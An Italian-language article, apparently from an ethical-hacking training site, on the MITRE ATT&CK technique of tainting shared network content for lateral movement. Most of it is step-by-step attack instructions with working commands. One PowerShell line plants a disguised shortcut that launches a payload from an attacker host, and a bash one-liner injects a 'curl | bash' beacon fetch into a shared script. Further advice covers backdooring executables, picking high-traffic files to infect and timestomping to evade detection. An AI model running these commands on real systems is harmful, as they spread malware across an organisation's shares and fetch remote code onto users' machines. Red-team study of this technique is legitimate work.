Condivisioni di Rete Compromesse: Taint Shared Content (T1080)

Il movimento laterale attraverso contenuti condivisi rappresenta una tecnica di propagazione silenziosa che sfrutta l'infrastruttura di collaborazione aziendale. Gli attaccanti contaminano file apparentemente legittimi su share di rete, repository interni o NAS aziendali con payload malevoli, trasformando strumenti di produttività in vettori di infezione.

Questa metodologia si manifesta nella tattica TA0008 (Lateral Movement), consentendo agli avversari di espandere il controllo attraverso sistemi remoti. La tecnica ha dimostrato particolare efficacia con 5 gruppi APT documentati e 7 famiglie di malware specializzate.

L'approccio più sofisticato coinvolge la tecnica "directory share pivot": file LNK mascherati sostituiscono directory legittime, nascondendo il contenuto originale e iniettando comandi malevoli all'apertura. Quando un utente accede alla falsa directory, il malware si esegue silenziosamente prima di mostrare il contenuto atteso.

La simulazione inizia con la preparazione di un payload mascherato. Su Windows, create un LNK malevolo che sostituisce una directory condivisa:

powershell -Command "$sh = New-Object -ComObject WScript.Shell; $lnk = $sh.CreateShortcut('\server\share\Budget2024.lnk'); $lnk.TargetPath = 'C:\Windows\System32\cmd.exe'; $lnk.Arguments = '/c start \attacker\payload.exe & explorer \server\share\RealBudget2024'; $lnk.IconLocation = 'C:\Windows\System32\imageres.dll,3'; $lnk.Save()"

Nascondete la directory originale modificando gli attributi: attrib +h +s "\server\share\RealBudget2024"

Per Linux, contaminate script condivisi iniettando codice all'inizio di file bash esistenti. Questo approccio mantiene la funzionalità originale mascherando l'infezione:

echo 'curl -s http://attacker/beacon.sh | bash &' | cat - /mnt/shared/backup.sh > temp && mv temp /mnt/shared/backup.sh

La contaminazione di binari richiede manipolazione dell'entry point. Utilizzate tool come The Backdoor Factory per infettare EXE mantenendo funzionalità originali. L'infezione si propaga quando utenti remoti eseguono il file compromesso.

Per massimizzare la propagazione, target file con alta frequenza d'uso: template Office, script di login, utility condivise. Gamaredon Group ha dimostrato l'efficacia iniettando macro in tutti i documenti Word/Excel su drive mappati.

Testate la persistenza creando infezioni che sopravvivono a riavvii e scansioni superficiali. Utilizzate tecniche di timestomping per mantenere date originali dei file infetti.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo